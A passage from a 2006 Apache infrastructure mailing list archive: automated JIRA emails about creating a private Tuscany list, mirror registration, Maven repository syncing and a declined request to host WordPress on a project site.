If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 20:49:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58482 invoked from network); 8 Jun 2006 20:49:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 20:49:38 -0000 Received: (qmail 41613 invoked by uid 500); 8 Jun 2006 20:49:36 -0000 Delivered-To: [email protected] Received: (qmail 41256 invoked by uid 500); 8 Jun 2006 20:49:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41242 invoked by uid 99); 8 Jun 2006 20:49:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:49:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:49:34 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2C9B971428E for <[email protected]>; Thu, 8 Jun 2006 20:48:30 +0000 (GMT) Message-ID: <16071169.1149799710179.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 20:48:30 +0000 (GMT+00:00) From: "Jeremy Boynes (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=comments#action_12415423 ] Jeremy Boynes commented on INFRA-839: ------------------------------------- As part of incubation we are building the community for Tuscany itself. Part of that is allowing the committers on the project to learn and perform the responsibilies of being PMC members (such as nominating new committers) without actually being on a PMC. The process, and legally binding PMC actions, are overseen by the Incubator PMC. Previously incubated projects such as Geronimo and Derby have had such a list, with responsibility being transferred to the destination PMC on graduation; other projects under graduation (such as Synapse) have similar lists already. > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 20:56:39 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60502 invoked from network); 8 Jun 2006 20:56:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 20:56:38 -0000 Received: (qmail 51084 invoked by uid 500); 8 Jun 2006 20:56:36 -0000 Delivered-To: [email protected] Received: (qmail 50824 invoked by uid 500); 8 Jun 2006 20:56:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50811 invoked by uid 99); 8 Jun 2006 20:56:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:56:34 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 13:56:34 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3358071428E for <[email protected]>; Thu, 8 Jun 2006 20:55:30 +0000 (GMT) Message-ID: <33027503.1149800130192.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 20:55:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=comments#action_12415424 ] Joshua Slive commented on INFRA-839: ------------------------------------ Geronimo is a bad example because they became an independent project. Personally, I think it is a bad idea for sub-projects to have their own private lists -- even during incubation. The result will be a separation of the community of the subproject from the community of the parent project, which in turn will result in the parent project being unable to provide proper oversight. In other words, the worst characteristics of umbrella projects. But this isn't a good place to debate incubator policy. If the incubator PMC approves of this, you can feel free to ignore me. > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 08 23:34:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95749 invoked from network); 8 Jun 2006 23:34:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2006 23:34:42 -0000 Received: (qmail 42982 invoked by uid 500); 8 Jun 2006 23:34:36 -0000 Delivered-To: [email protected] Received: (qmail 42682 invoked by uid 500); 8 Jun 2006 23:34:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42665 invoked by uid 99); 8 Jun 2006 23:34:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 16:34:35 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 08 Jun 2006 16:34:34 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D40F71429B for <[email protected]>; Thu, 8 Jun 2006 23:33:30 +0000 (GMT) Message-ID: <25486044.1149809610155.JavaMail.jira@brutus> Date: Thu, 8 Jun 2006 23:33:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-839) Private list for Tuscany project In-Reply-To: <12820429.1149796289765.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-839?page=comments#action_12415448 ] Brett Porter commented on INFRA-839: ------------------------------------ the list should be [email protected]. There's precedent for this in Derby and Lucene.NET. Jeremy summed up the reasons, and I recall them being discussed on the general@incubator list. All of the WS PMC members should be able to join to make sure it's like being a part of the parent project, I suspect. > Private list for Tuscany project > -------------------------------- > > Key: INFRA-839 > URL: http://issues.apache.org/jira/browse/INFRA-839 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremy Boynes > > The Tuscany project does not have a private/ppmc list for discussion of things like new committers. Please can we create a list for that with the archive visible to tuscany committers (ws-tuscany group I believe). > The current lists are under ws e.g. [email protected] > Please can you create > [email protected] > or > [email protected] > as appropriate. > Please add jboynes as a moderator for the new list with the ability to add other subscribers. Is it possible to pre-subscribe all Tuscany committers or should they send in subscription requests? -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 09 17:58:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96033 invoked from network); 9 Jun 2006 17:58:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2006 17:58:41 -0000 Received: (qmail 81378 invoked by uid 500); 9 Jun 2006 17:58:37 -0000 Delivered-To: [email protected] Received: (qmail 81098 invoked by uid 500); 9 Jun 2006 17:58:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81073 invoked by uid 99); 9 Jun 2006 17:58:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jun 2006 10:58:36 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jun 2006 10:58:35 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 284657141F1 for <[email protected]>; Fri, 9 Jun 2006 17:57:30 +0000 (GMT) Message-ID: <22312995.1149875850146.JavaMail.jira@brutus> Date: Fri, 9 Jun 2006 17:57:30 +0000 (GMT+00:00) From: "Paul Querna (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-830) Add Abdera to Bugzilla In-Reply-To: <28560783.1149557789783.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-830?page=all ] Paul Querna closed INFRA-830: ----------------------------- Resolution: Won't Fix Cancel That. It looks like people actually want to use Jira for issue tracking. > Add Abdera to Bugzilla > ---------------------- > > Key: INFRA-830 > URL: http://issues.apache.org/jira/browse/INFRA-830 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Bugzilla > Reporter: Paul Querna > > Need an Abdera project created in Bugzilla. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 09 18:41:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10382 invoked from network); 9 Jun 2006 18:41:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2006 18:41:42 -0000 Received: (qmail 64082 invoked by uid 500); 9 Jun 2006 18:41:37 -0000 Delivered-To: [email protected] Received: (qmail 63852 invoked by uid 500); 9 Jun 2006 18:41:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63840 invoked by uid 99); 9 Jun 2006 18:41:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jun 2006 11:41:36 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 09 Jun 2006 11:41:35 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5CC387141F1 for <[email protected]>; Fri, 9 Jun 2006 18:40:30 +0000 (GMT) Message-ID: <25522878.1149878430350.JavaMail.jira@brutus> Date: Fri, 9 Jun 2006 18:40:30 +0000 (GMT+00:00) From: "Simon Clausen (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-840) Apache Dist, New US Mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Apache Dist, New US Mirror -------------------------- Key: INFRA-840 URL: http://issues.apache.org/jira/browse/INFRA-840 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Reporter: Simon Clausen Priority: Minor * URL of mirror: http://apache.us.lucid.dk * Country where the mirror is located: Texas, USA * Contact email address: [email protected] * Update frequency: 3 times/day * Rsync repository used: rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist * Approximate bandwidth: 100mbit, peered to SAVVIS us backbone network * I have configured my HTTP server as requested (yes/no): Yes * I have subscribed to the mirror maintainers mailing list (yes/no): Yes -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 10 07:08:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62155 invoked from network); 10 Jun 2006 07:08:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jun 2006 07:08:40 -0000 Received: (qmail 48190 invoked by uid 500); 10 Jun 2006 07:08:38 -0000 Delivered-To: [email protected] Received: (qmail 47957 invoked by uid 500); 10 Jun 2006 07:08:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47946 invoked by uid 99); 10 Jun 2006 07:08:37 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 00:08:37 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 00:08:36 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 7D0787141F2 for <[email protected]>; Sat, 10 Jun 2006 07:07:30 +0000 (GMT) Message-ID: <17497650.1149923250493.JavaMail.jira@brutus> Date: Sat, 10 Jun 2006 07:07:30 +0000 (GMT+00:00) From: "Jukka Zitting (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-841) Maven repositories not being synchronized? MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Maven repositories not being synchronized? ------------------------------------------ Key: INFRA-841 URL: http://issues.apache.org/jira/browse/INFRA-841 Project: Infrastructure Type: Bug Security: public (Regular issues) Reporter: Jukka Zitting Priority: Minor (Not sure if this is the correct place to ask, please let me know where to go if not.) Has there been some changes in the way the Maven 1 repository at .../dist/java-repository is synchronized with the repository at Ibiblio? I published the recently released Apache Jackrabbit 1.0.1 artifacts in the Apache Maven 1 repository, but after ten days the files are still not [email protected]. Compare: http://www.ibiblio.org/maven/org.apache.jackrabbit/jars/ http://www.apache.org/dist/java-repository/org.apache.jackrabbit/jars/ -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 10 07:14:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63454 invoked from network); 10 Jun 2006 07:14:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jun 2006 07:14:39 -0000 Received: (qmail 49959 invoked by uid 500); 10 Jun 2006 07:14:37 -0000 Delivered-To: [email protected] Received: (qmail 49641 invoked by uid 500); 10 Jun 2006 07:14:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49630 invoked by uid 99); 10 Jun 2006 07:14:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 00:14:36 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 00:14:36 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 240537141F2 for <[email protected]>; Sat, 10 Jun 2006 07:13:30 +0000 (GMT) Message-ID: <12626198.1149923610144.JavaMail.jira@brutus> Date: Sat, 10 Jun 2006 07:13:30 +0000 (GMT+00:00) From: "Jukka Zitting (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-841) Maven repositories not being synchronized? In-Reply-To: <17497650.1149923250493.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-841?page=comments#action_12415648 ] Jukka Zitting commented on INFRA-841: ------------------------------------- Hmm, I noticed one difference with the 1.0.1 artifacts I published. They are not group-writable. Can this be a problem? I just added the group-writable bit. > Maven repositories not being synchronized? > ------------------------------------------ > > Key: INFRA-841 > URL: http://issues.apache.org/jira/browse/INFRA-841 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Reporter: Jukka Zitting > Priority: Minor > > (Not sure if this is the correct place to ask, please let me know where to go if not.) > Has there been some changes in the way the Maven 1 repository at .../dist/java-repository is synchronized with the repository at Ibiblio? I published the recently released Apache Jackrabbit 1.0.1 artifacts in the Apache Maven 1 repository, but after ten days the files are still not [email protected]. > Compare: > http://www.ibiblio.org/maven/org.apache.jackrabbit/jars/ > http://www.apache.org/dist/java-repository/org.apache.jackrabbit/jars/ -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 10 20:56:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1820 invoked from network); 10 Jun 2006 20:56:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jun 2006 20:56:39 -0000 Received: (qmail 54419 invoked by uid 500); 10 Jun 2006 20:56:38 -0000 Delivered-To: [email protected] Received: (qmail 54164 invoked by uid 500); 10 Jun 2006 20:56:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54152 invoked by uid 99); 10 Jun 2006 20:56:37 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 13:56:37 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 13:56:37 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1AB697141E6 for <[email protected]>; Sat, 10 Jun 2006 20:55:30 +0000 (GMT) Message-ID: <19489091.1149972930079.JavaMail.jira@brutus> Date: Sat, 10 Jun 2006 20:55:30 +0000 (GMT+00:00) From: "Jesse Kuhnert (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-842) cough...umm..execute php ? MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N cough...umm..execute php ? --------------------------- Key: INFRA-842 URL: http://issues.apache.org/jira/browse/INFRA-842 Project: Infrastructure Type: Wish Security: public (Regular issues) Components: HTTP Server Environment: minotaur (or ajax I guess ultimately?.. ) Reporter: Jesse Kuhnert Priority: Minor Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 10 21:18:47 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6398 invoked from network); 10 Jun 2006 21:18:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jun 2006 21:18:45 -0000 Received: (qmail 69409 invoked by uid 500); 10 Jun 2006 21:18:40 -0000 Delivered-To: [email protected] Received: (qmail 69141 invoked by uid 500); 10 Jun 2006 21:18:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69130 invoked by uid 99); 10 Jun 2006 21:18:38 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 14:18:38 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 14:18:38 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id EA1B07141E6 for <[email protected]>; Sat, 10 Jun 2006 21:17:30 +0000 (GMT) Message-ID: <10484269.1149974250956.JavaMail.jira@brutus> Date: Sat, 10 Jun 2006 21:17:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-842) cough...umm..execute php ? In-Reply-To: <19489091.1149972930079.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-842?page=all ] Joshua Slive resolved INFRA-842: -------------------------------- Resolution: Won't Fix This is something you should consider experimenting with on a zone: http://www.apache.org/dev/solaris-zones.html Adding more dynamic content on the main sites would break our mirroring/backup strategy and isn't in the cards for the time being. But I agree with you that it is probably inevitabel in the future. For now, use the zones. > cough...umm..execute php ? > -------------------------- > > Key: INFRA-842 > URL: http://issues.apache.org/jira/browse/INFRA-842 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: HTTP Server > Environment: minotaur (or ajax I guess ultimately?.. ) > Reporter: Jesse Kuhnert > Priority: Minor > > Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. > Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ > Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. > It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 10 21:58:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12298 invoked from network); 10 Jun 2006 21:58:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jun 2006 21:58:41 -0000 Received: (qmail 89960 invoked by uid 500); 10 Jun 2006 21:58:40 -0000 Delivered-To: [email protected] Received: (qmail 89660 invoked by uid 500); 10 Jun 2006 21:58:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89649 invoked by uid 99); 10 Jun 2006 21:58:38 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 14:58:38 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 10 Jun 2006 14:58:37 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D4A17141E6 for <[email protected]>; Sat, 10 Jun 2006 21:57:30 +0000 (GMT) Message-ID: <6915236.1149976650155.JavaMail.jira@brutus> Date: Sat, 10 Jun 2006 21:57:30 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-842) cough...umm..execute php ? In-Reply-To: <19489091.1149972930079.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-842?page=comments#action_12415713 ] Joe Schaefer commented on INFRA-842: ------------------------------------ Running wordpress on a zone is [email protected]. I think the technology choices for zones have to be acceptible to infra, and I'm not sure wordpress, or even php, qualifies. > cough...umm..execute php ? > -------------------------- > > Key: INFRA-842 > URL: http://issues.apache.org/jira/browse/INFRA-842 > Project: Infrastructure > Type: Wish > Security: public(Regular issues) > Components: HTTP Server > Environment: minotaur (or ajax I guess ultimately?.. ) > Reporter: Jesse Kuhnert > Priority: Minor > > Probably a crackpot idea fraught with disaster if allowed to happen all over the ASF, but the sort of modern trend of some open source projects is to provide more dynamic content on their site, like news is a huge one. > Very specifically I'm asking if /www/tapestry.apache.org/ could have a new sub directory, /www/tapestry.apache.org/blog/ that contains a wordpress installation to run a "news" sort of section of the site with. ..Something sort of like http://blog.dojotoolkit.org/ > Normally wordpress likes to connect to a mysql (or other) DB server as well, I don't mind having ajax connect back out to a hosted mysql server not being run by infra if it helps. > It's understandable if it is asking too much, just think it might be something the ASF might want to consider at some point.. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 11 17:57:43 2006 